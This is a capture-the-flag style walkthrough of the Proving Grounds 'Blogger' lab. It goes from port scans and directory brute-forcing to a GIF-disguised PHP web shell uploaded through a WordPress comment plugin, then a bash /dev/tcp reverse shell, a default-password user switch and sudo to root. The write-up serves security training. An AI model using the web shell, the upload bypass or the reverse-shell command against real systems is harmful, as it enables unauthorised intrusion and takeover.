Post

Proving Grounds - Blogger

Introduction

This is a Proving Grounds room which can be found at: Blogger

The Blog of War

Reconnaissance & Scanning

Perform nmap scan to identify open ports and services.

  • Command: nmap -p- -T4 -v 192.168.81.217
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
geobour98@kali:~$ nmap -p- -T4 -v 192.168.81.217
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-19 21:53 EEST
Initiating Ping Scan at 21:53
Scanning 192.168.81.217 [2 ports]
Completed Ping Scan at 21:53, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:53
Completed Parallel DNS resolution of 1 host. at 21:53, 0.00s elapsed
Initiating Connect Scan at 21:53
Scanning 192.168.81.217 (192.168.81.217) [65535 ports]
Discovered open port 80/tcp on 192.168.81.217
Discovered open port 22/tcp on 192.168.81.217
Completed Connect Scan at 21:53, 16.72s elapsed (65535 total ports)
Nmap scan report for 192.168.81.217 (192.168.81.217)
Host is up (0.053s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 16.83 seconds

Perform aggressive nmap scan to enable OS detection, default scripts and version detection on the found ports.

  • Command: sudo nmap -A -sC -p 22,80 -v 192.168.81.217
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
geobour98@kali:~$ sudo nmap -A -sC -p 22,80 -v 192.168.81.217
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-19 21:53 EEST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:53
Completed NSE at 21:53, 0.00s elapsed
Initiating NSE at 21:53
Completed NSE at 21:53, 0.00s elapsed
Initiating NSE at 21:53
Completed NSE at 21:53, 0.00s elapsed
Initiating Ping Scan at 21:53
Scanning 192.168.81.217 [4 ports]
Completed Ping Scan at 21:53, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:53
Completed Parallel DNS resolution of 1 host. at 21:53, 0.00s elapsed
Initiating SYN Stealth Scan at 21:53
Scanning 192.168.81.217 (192.168.81.217) [2 ports]
Discovered open port 22/tcp on 192.168.81.217
Discovered open port 80/tcp on 192.168.81.217
Completed SYN Stealth Scan at 21:53, 0.10s elapsed (2 total ports)
Initiating Service scan at 21:53
Scanning 2 services on 192.168.81.217 (192.168.81.217)
Completed Service scan at 21:54, 6.12s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.81.217 (192.168.81.217)
Retrying OS detection (try #2) against 192.168.81.217 (192.168.81.217)
Initiating Traceroute at 21:54
Completed Traceroute at 21:54, 0.06s elapsed
Initiating Parallel DNS resolution of 1 host. at 21:54
Completed Parallel DNS resolution of 1 host. at 21:54, 0.00s elapsed
NSE: Script scanning 192.168.81.217.
Initiating NSE at 21:54
Completed NSE at 21:54, 6.78s elapsed
Initiating NSE at 21:54
Completed NSE at 21:54, 0.22s elapsed
Initiating NSE at 21:54
Completed NSE at 21:54, 0.00s elapsed
Nmap scan report for 192.168.81.217 (192.168.81.217)
Host is up (0.054s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 95:1d:82:8f:5e:de:9a:00:a8:07:39:bd:ac:ad:d3:44 (RSA)
|   256 d7:b4:52:a2:c8:fa:b7:0e:d1:a8:d0:70:cd:6b:36:90 (ECDSA)
|_  256 df:f2:4f:77:33:44:d5:93:d7:79:17:45:5a:a1:36:8b (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Blogger | Home
| http-methods: 
|_  Supported Methods: HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2.0 (95%), Linux 3.11 - 4.1 (94%), Linux 4.4 (94%), Linux 3.16 (93%), Linux 3.13 (92%), Linux 3.10 - 3.16 (91%), Linux 3.10 - 3.12 (90%), Linux 3.10 - 4.11 (90%), Linux 3.12 (90%), Linux 3.13 or 4.2 (90%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.006 days (since Mon Sep 19 21:46:10 2022)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   55.69 ms 192.168.49.1 (192.168.49.1)
2   52.86 ms 192.168.81.217 (192.168.81.217)

NSE: Script Post-scanning.
Initiating NSE at 21:54
Completed NSE at 21:54, 0.00s elapsed
Initiating NSE at 21:54
Completed NSE at 21:54, 0.00s elapsed
Initiating NSE at 21:54
Completed NSE at 21:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.70 seconds
           Raw packets sent: 78 (5.316KB) | Rcvd: 42 (16.692KB)

Brute force the website for directories using gobuster.

  • Command: gobuster dir -u http://192.168.81.217/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
geobour98@kali:~$ gobuster dir -u http://192.168.81.217/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.81.217/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/09/19 21:56:47 Starting gobuster in directory enumeration mode
===============================================================
/assets               (Status: 301) [Size: 317] [--> http://192.168.81.217/assets/]
/css                  (Status: 301) [Size: 314] [--> http://192.168.81.217/css/]   
/images               (Status: 301) [Size: 317] [--> http://192.168.81.217/images/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.81.217/js/]    
/server-status        (Status: 403) [Size: 279]                                    
                                                                                   
===============================================================
2022/09/19 22:00:56 Finished
===============================================================

The navigation on port 80 and /assets directory leads to the URL: http://192.168.81.217/assets/fonts/blog/ which appears to be a blog not displaying correctly.

After hovering over most links, they lead to blogger.thm so in order for the blog to be displayed correctly we need to add the domain name and the IP address in /etc/hosts file.

Then, the operating system will translate the hostname blogger.thm to the IP 192.168.81.217.

The contents of /etc/hosts should look like this:

1
2
3
4
geobour98@kali:~$ cat /etc/hosts
[REDACTED]
192.168.81.217  blogger.thm
[REDACTED]

Exploitation

Now, navigate to http://blogger.thm/assets/fonts/blog/ and the blog is displayed correctly.

It appears to be a Wordpress blog, so we could use the wpscan tool to enumerate for all plugins, all themes, config backups and Db exports, but no interesting results are shown.

  • Command: wpscan --url http://blogger.thm/assets/fonts/blog/ -e ap,at,cb,dbe

If we navigate to whichever post, we identify Comment functionality that can include the attachment of an image.

Create cmd.php with contents:

1
2
3
4
GIF87a
<?php
system($_REQUEST['cmd']);
?>

Above the php code we have put the magic bytes of a GIF file according to: https://en.wikipedia.org/wiki/List_of_file_signatures, in order for our file to be treated as a GIF file.

Then, we attach the cmd.php, open Burp Suite, turn Intercept to On, and click on POST COMMENT. Finally, click Forward on Burp Suite.

The request should look like this:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
POST /assets/fonts/blog/wp-admin/admin-ajax.php HTTP/1.1
Host: blogger.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------5658711851211151532350158244
Content-Length: 1421
Origin: http://blogger.thm
Connection: close
Referer: http://blogger.thm/assets/fonts/blog/?p=29
Cookie: wpdiscuz_hide_bubble_hint=1

-----------------------------5658711851211151532350158244
Content-Disposition: form-data; name="action"

wpdAddComment
-----------------------------5658711851211151532350158244
Content-Disposition: form-data; name="wc_comment"

test
-----------------------------5658711851211151532350158244
Content-Disposition: form-data; name="wmu_files[]"

C:\fakepath\cmd.php
-----------------------------5658711851211151532350158244
Content-Disposition: form-data; name="wmu_attachments"

{"images":[34]}
-----------------------------5658711851211151532350158244
Content-Disposition: form-data; name="wc_name"

test
-----------------------------5658711851211151532350158244
Content-Disposition: form-data; name="wc_email"

test@test.com
-----------------------------5658711851211151532350158244
Content-Disposition: form-data; name="wc_website"

https://test.com
-----------------------------5658711851211151532350158244
Content-Disposition: form-data; name="submit"

Post Comment
-----------------------------5658711851211151532350158244
Content-Disposition: form-data; name="wpdiscuz_unique_id"

0_0
-----------------------------5658711851211151532350158244
Content-Disposition: form-data; name="wpd_comment_depth"

1
-----------------------------5658711851211151532350158244
Content-Disposition: form-data; name="postId"

29
-----------------------------5658711851211151532350158244--

The file cmd.php is successfully uploaded and in the Comments section we can a link for cmd.php which leads to: http://blogger.thm/assets/fonts/blog/wp-content/uploads/2022/09/cmd-1663615798.9082.php.

At this point, we can execute code by navigating to: http://blogger.thm/assets/fonts/blog/wp-content/uploads/2022/09/cmd-1663615798.9082.php?cmd=id

Output:

1
GIF87a uid=33(www-data) gid=33(www-data) groups=33(www-data) 

We are the user www-data, so now we want to get a reverse shell.

Intercept this request: http://blogger.thm/assets/fonts/blog/wp-content/uploads/2022/09/cmd-1663615798.9082.php?cmd=id with Burp Suite, change it as shown below, click on Forward and open a netcat listener.

1
2
3
4
5
6
7
8
9
10
11
GET /assets/fonts/blog/wp-content/uploads/2022/09/cmd-1663615798.9082.php?cmd=bash+-c+'exec+bash+-i+%26>/dev/tcp/192.168.49.81/443+<%261' HTTP/1.1
Host: blogger.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: wpdiscuz_hide_bubble_hint=1; comment_author_email_f401df2453a4515e2d6a824db178db1a=test@test.com; comment_author_f401df2453a4515e2d6a824db178db1a=test; comment_author_url_f401df2453a4515e2d6a824db178db1a=https://test.com
Upgrade-Insecure-Requests: 1


Now we have a reverse shell as the www-data user.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
geobour98@kali:~$ nc -lvnp 443
listening on [any] 443 ...                                                                               
connect to [192.168.49.81] from (UNKNOWN) [192.168.81.217] 54292                                         
bash: cannot set terminal process group (1428): Inappropriate ioctl for device                           
bash: no job control in this shell 
<ress/assets/fonts/blog/wp-content/uploads/2022/09$ python3 -c 'import pty;pty.spawn("/bin/bash")'
<content/uploads/2022/09$ python3 -c 'import pty;pty.spawn("/bin/bash")'     
<ress/assets/fonts/blog/wp-content/uploads/2022/09$ ^Z
zsh: suspended  nc -lvnp 443

geobour98@kali:~$ stty raw -echo;fg
[1]  + continued  nc -lvnp 443
<content/uploads/2022/09$ export TERM=xterm-256color
www-data@ubuntu-xenial:/var/www/wordpress/assets/fonts/blog/wp-content/uploads/2022/09$ stty rows 38 cols 111
www-data@ubuntu-xenial:/var/www/wordpress/assets/fonts/blog/wp-content/uploads/2022/09$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Navigate to /home and we see home folders of the users: james, ubuntu and vagrant.

Vagrant is an open-source tool that allows you to create, configure, and manage boxes of virtual machines through an easy to use command interface.

There is also a default password: vagrant for root on the Vagrant tool. We can try that password for the vagrant user.

1
2
3
4
www-data@ubuntu-xenial:/home/vagrant$ su vagrant                                                         
Password:                                                                                                
vagrant@ubuntu-xenial:~$ id
uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant)

Now we are the user vagrant and can read the local.txt from /home/james/ directory.

1
2
vagrant@ubuntu-xenial:/home/james$ cat local.txt 
[REDACTED]

Privilege Escalation

After executing the command: sudo -l we see that we can execute anything as root.

1
2
3
4
5
6
7
8
9
10
11
12
13
vagrant@ubuntu-xenial:/home/james$ sudo -l
Matching Defaults entries for vagrant on ubuntu-xenial:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User vagrant may run the following commands on ubuntu-xenial:
    (ALL) NOPASSWD: ALL
vagrant@ubuntu-xenial:/home/james$ sudo -s
root@ubuntu-xenial:/home/james# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu-xenial:/home/james# cd /root
root@ubuntu-xenial:/root# cat proof.txt
[REDACTED]

Proof of Concept (PoC image): Desktop View

This post is licensed under CC BY 4.0 by the author.